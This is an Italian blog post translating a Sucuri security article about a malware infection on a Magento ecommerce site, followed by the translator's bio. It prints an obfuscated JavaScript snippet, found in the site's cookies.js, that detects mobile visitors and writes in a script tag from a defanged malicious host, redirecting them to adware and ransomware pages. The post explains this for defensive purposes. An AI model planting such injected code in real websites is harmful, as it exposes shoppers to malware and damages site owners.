Malware smartphone colpisce siti ed utenti ecommerce

malware smartphone ecommerce

29 Ago Malware smartphone colpisce siti ed utenti ecommerce

Posted at 11:38h in Sicurezza by

Traduzione autorizzata da Sucuri che detiene il copyright dell’articolo. Leggi l’articolo originale (in Inglese)

Un malware mobile è un software dannoso che mira a telefoni cellulari / smartphone, tablet e dispositivi simili. Gli attacchi possono variare da danneggiamenti fatali all’OS (cd. bricking) alla perdita di informazioni sensibili e personali, come carte di credito, password salvate, immagini e molto altro ancora.

 

Hai problemi di malware nel tuo ecommerce?

chiama 339 848 3250

 

Con la costante crescita degli utenti mobili, gli attaccanti stanno concentrando i loro sforzi sullo sviluppo di malware mirati a questi dispositivi. In questo articolo descriveremo come Sucuri abbia rilevato un attacco interessante contro una piattaforma di ecommerce.

Durante una ricerca sull’incidente, Sucuri ha identificato un codice dannoso in un’installazione di Magento che si trova nel file “./js/mage/cookies.js”. Ecco parte dello snippet:

var _$_f51c = [“userAgent”, “vendor”, “opera”, “test”, “substr”, “<script type=\”text/javascript\” src=\”hxxp://Malicious-URL-REMOVED.com/odessa/?md2\”></script>”, “write”];

function isMobile() {
var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);
if (/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || )) {
return true
};
return false
}
if (isMobile() === true) {
document[_$_f51c[6]](_$_f51c[5])
}

La funzione isMobile () controlla se il visitatore utilizza uno degli elenchi predefiniti di smartphone / tablet e se corrisponde, l’utente verrà reindirizzato ad altri siti maligni.

Questi altri siti web richiederanno l’installazione di software di terze parti che richiedono di pulire o velocizzare dispositivi mobili, barre degli strumenti, adware o addirittura peggio, URL dannosi che distribuiscono ransomware che bloccheranno il dispositivo e lo faranno ostaggio fino a quando verrà pagato un importo X di denaro all’attaccante via bitcoin.

A seconda della campagna dell’attaccante, possono anche reindirizzare i visitatori o i potenziali acquirenti ai siti web concorrenti, causando così un enorme impatto sui redditi del proprietario del sito. Tieni presente che questi attacchi non sono limitati ai siti Web di Magento, perché potrebbero essere destinati a WordPress, Joomla, OpenCart, Prestashop e altre piattaforme diverse.

Per individuare e prevenire queste problematiche, ti consigliamo di installare un sistema di monitoraggio dell’integrità dei file e di avere dei backup dei file / database a disposizione. Se il tuo ambiente è compromesso, sarai in grado di identificare e tempestivamente ripristinare i file per evitare ulteriori danni alla tua presenza online e SEO.

Articolo di Moe Obaid,  Sucuri

Federico Benvenuto
info@fedegrafia.com

Mi chiamo Federico Benvenuto, web designer e grafico freelance a Pordenone. Mi occupo di creazione siti internet, consulenza web marketing e SEO, di grafica e stampa, corsi su contenuti internet e servizi fotografici. Ho una specializzazione Tecnico web designer – editing multimediale e in Comunicazione digitale per l’e-government ottenute presso Enaip FVG. Ho conseguito il diploma di Fotografia Professionale Avanzata presso CSG G. Micesio di Udine. Sono laureato in Economia e Commercio ed ho una specializzazione di secondo livello in Marketing per le piccole medie imprese. Lavoro principalmente per pmi, enti pubblici e organizzatori eventi della provincia di Pordenone, Udine e del Veneto orientale (province di Venezia e Treviso).

No Comments

Scrivi un Commento

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.